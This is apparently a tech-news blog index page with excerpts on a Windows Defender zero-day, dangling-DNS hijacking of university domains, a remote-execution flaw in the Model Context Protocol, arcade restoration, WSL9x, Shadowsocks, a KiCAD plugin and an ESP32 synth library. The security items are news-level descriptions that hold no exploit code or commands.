This Week In Security: Annoyed Researchers, Dangling DNS, And Hacks That Could Have Been Worse

April 24, 2026 by 1 Comment

The author of the BlueHammer exploit, which was released earlier this month and addressed in the last Patch Tuesday, continues to be annoyed with the responses from the Microsoft security research and vulnerability response team, and has released another Windows zero-day attack against Windows Defender.

The RedSun exploit targets a logic and timing error in Windows Defender, convincing it to install the target file in the system, instead of quarantining the file and protecting the system. Not, generally, what you would hope would happen.

Since the RedSun attack requires local access in the first place, it seems unlikely Microsoft will release an out-of-sequence patch for it, however with public code available, we can probably expect to see malware leveraging it to establish higher permissions on an infected system.

Releasing exploits out of spite feels like a return to the late 1990s, and I almost don’t hate it.

University Domains Hijacked

Reported in Bleeping Computer, a group tracked as “Hazy Hawk” has been hijacking unmaintained DNS records of universities and government institutions to serve ad click spam.

The attack seems simple and doesn’t even require compromising the actual institution, using dangling DNS “CNAME” records. A “CNAME” entry in DNS acts essentially as an alias, pointing one domain name at another, which can be used to provide content from an official domain that is hosted on a cloud service where the IP address of the service might change.

A DNS “A” (or “AAAA” if you speak IPv6) record points a hostname – like “foo.example.com” – to an IP address – like “1.1.1.1”. A “CNAME” record points a hostname to another hostname, like “foo.some_cloud_host.com”. Scanning “high value” domains (like Ivy League universities) for “CNAME” records which point to expired domains (or domains on cloud hosted providers which no longer exist) lets anyone able to register that domain (or create an account with the proper naming scheme on the cloud host) to post any content they wish, and still appear to be the original name.

At least 30 educational institutions have been impacted, along with several government agencies including the CDC.

Continue reading “This Week In Security: Annoyed Researchers, Dangling DNS, And Hacks That Could Have Been Worse”

How Anthropic’s Model Context Protocol Allows For Easy Remote Execution

April 24, 2026 by 10 Comments

As part of the effort to push Large Language Model (LLM) ‘AI’ into more and more places, Anthropic’s Model Context Protocol (MCP) has been adopted as the standard to connect LLMs with various external tools and systems in a client-server model. A light oversight with the architecture of this protocol is that remote command execution (RCE) of arbitrary commands is effectively an essential part of its design, as covered in a recent article by [OX Security].

The details of this flaw are found in a detailed breakdown article, which applies to all implementations regardless of the programming language. Essentially the StdioServerParameters that are passed to the remote server to create a new local instance on said server can contain any command and arguments, which are executed in a server-side shell.

Continue reading “How Anthropic’s Model Context Protocol Allows For Easy Remote Execution”

Reviving Nintendo’s Early Arcade Game, Wild Gunman

April 24, 2026 by 5 Comments

There’s retrogaming, and then there’s retro gaming. This next project falls into the second category, as [Callan] of 74XX Arcade Repair digs into the original Wild Gunman, first released by Nintendo way, way back in 1974 — on 16 mm film. Yes, it was a film-based arcade machine, but how else were you going to get realistic graphics just two years after PONG?

The game had two 16 mm projectors, with four different sets of film reels available, each depicting five gunmen. Unfortunately for [Callan], the film is all he has, so he’s not so much repairing as re-creating the historic game. Luckily, he had the manuals, so at least he knew how it was supposed to come together.

One projector did most of the work, showing the gunmen and a hidden timing signal for the game to know when the user could shoot; the other only activated if the user pulled the trigger at the correct time. Interestingly the ‘gun’ has an IR illuminator that bounced infrared light off the screen to a detector in the cabinet — much like later TV remotes. That makes for a rather large circular hitbox around the enemy gunslinger, which is perhaps not a bad thing for a game likely to be found in a bar.

Continue reading “Reviving Nintendo’s Early Arcade Game, Wild Gunman

WSL9x: Add A Linux Subsystem To Your Windows 9x

April 23, 2026 by 13 Comments

Considering that Windows NT has the concept of so-called ‘subsystems’ whereby you can run different systems side-by-side, starting with the POSIX subsystem and later the Windows Subsystem for Linux (WSL), it was probably only a matter of time before someone figured that doing this with Windows 9x was also completely reasonable. Ergo we now got [Hailey Somerville]’s Linux Subsystem for Windows.

To make running Linux inside Windows 9x work, it was necessary to heavily patch a Linux kernel, as normally there are no provisions for such a subsystems in Windows 9x’s kernel unlike the NT kernel. Correspondingly, the Linux kernel is based on user-mode Linux and hacked to call Windows 9x kernel APIs instead of the POSIX ones.

In order to use WSL9x you thus need to build said modified Linux kernel – currently at version 6.19 – along with a disk image containing an installed copy of Windows 9x. From there WSL9x can be loaded with the wsl command and you’re then free to cooperatively run the Win9x and Linux kernel side-by-side. This is reminiscent of Cooperative Linux (coLinux), which did something similar except with Windows NT and Linux kernels running side-by-side, and of course we have WSL2 with Windows 10+.

Thanks to [adistuder] for the tip.

Encrypting Encrypted Traffic To Get Around VPN Bans

April 23, 2026 by 15 Comments

VPNs, Virtual Private Networks, aren’t just a good idea to keep your data secure: for millions of people living under restrictive regimes they’re the only way to ensure full access to the internet. What do you do when your government orders ISPs to ban VPNs, like Russia has done recently?  [LaserHelix] shows us one way you can cope, which is to use a ShadowSocks proxy.

If you’re not deep into network traffic, you might be wondering: how can an ISP block VPN traffic? Isn’t that stuff encrypted? Yes, but while the traffic going over the VPN is encrypted, you still need to connect to your VPN’s servers– and those handshake packets are easy enough to detect. You can do it at home with Wireshark, a tool that shows up fairly often on these pages. Of course if they can ID those packets, they can block them.

So, you just need a way to obfuscate what exactly the encrypted traffic you’re sending is. Luckily that’s a solved problem: Chinese hackers came up with something called Shadowsocks back in 2012 to help get around the Great Firewall, and have been in an arms-race with their authorities ever since.

Shadowsocks is not, in fact, a sibling of Gandalf’s horse as the name might suggest, but a tool to obfuscate the traffic going to your VPN. To invert a meme, you’re telling the authorities: we heard you don’t like encrypted traffic, so we put encryption in your encrypted traffic so you have to decrypt the packets before you recognize the encrypted packets.

What about the VPN? Well, some run their own shadowsocks service, while others will need to be accessed via a shadowsocks bridge: in effect, a proxy that then connects to the VPN for you. That means of course you’re bouncing through two servers you need to trust not to glow in the dark, but if you have to trust someone– otherwise it’s off to a shack in the woods, which never ends well.

Don’t forget that while VPNs can get you around government censorship, they do not provide anonymity on their own. If, like tipster [Keith Olson] –thanks for the tip, [Keith]!– you’re looking side-eyed at your government’s “think of the children!” rhetoric but don’t know where to start, we had a discussion about which VPNs to use last year.

This KiCAD Plugin Enables Breadboarding

April 23, 2026 by 11 Comments

Some people learning the noble art of electronics find the jump from simpler tools like Fritzing to more complex ones, such as KiCAD, a little daunting, especially since they need to learn at least two tools. Fritzing is great for visualising your breadboard layout, but what if you want to start from a proper schematic, make a prototype on a breadboard and then design a custom PCB? Well, with the Kicad-breadboard plugin for (you guessed it!) KiCAD, you can now do all of this in the same tool.

A simple dual-rail oscillator schematic corresponding to the featured image above

Originally designed to support EE students at the University of Antwerp, the tool presents you with a virtual breadboard with configurable size and style, along with a list of components and tools that can be placed. A few clicks and parts can be placed on the virtual breadboard with ease. Adding wires is the next logical step to make those connections that operate in the horizontal dimension. Finally, assigning power supplies and probe connections completes the process. It’s a simple enough tool to draw stuff, but drawing a layout is no use if you can’t verify it’s correctness. This is where this plugin shines: it can perform an ERC (check) between the schematic and the breadboard and flag up what you missed. Add to this that you can also perform an ERC at the schematic level, before even thinking about layout, and it’s pretty hard to make an error. Now, you can transfer this directly to a real breadboard, or even a veroboard, for more permanence once you have confidence in correctness. This will definitely save time correcting errors and help keep the magic smoke safely contained within those mysterious black rectangles.

Continue reading “This KiCAD Plugin Enables Breadboarding”

ESP32Synth : An Audio Synthesis Library For The ESP32

April 23, 2026 by 6 Comments

With MCUs becoming increasingly more powerful it was only a matter of time before they would enable some more serious audio-processing tasks. [Danilo Gabriel]’s ESP32Synth library is a good example here, which provides an ESP-IDF based 80+ voice mixing and synthesis engine. If you ever wanted to create a pretty impressive audio synthesizer, then all you really need to get started is an ESP32, ESP32-S3 or similar dual-core Espressif MCU that has the requisite processing power.

Audio output goes via I2S, requiring only a cheap I2S DAC like the UDA1334A or PCM5102 to be connected, unless you really want to use the internal DAC. With this wired up you get 80 voices by default, with up to 350 voices demonstrated before the hardware cannot keep up any more. You can stream multiple WAV files from an SD card for samples along with the typical oscillators like sinewave, triangle, sawtooth and pulse, as well as noise, wavetables and more.

In order to make this work in real-time a number of optimizations had to be performed, such as the removal of slow floating-point and division operations in the audio path. The audio rendering task is naturally pinned to a single core, leaving a single core for application code to use for remaining tasks. While the code is provided as an Arduino project, it uses ESP-IDF so it can likely be used for a regular ESP-IDF project as well without too much fuss.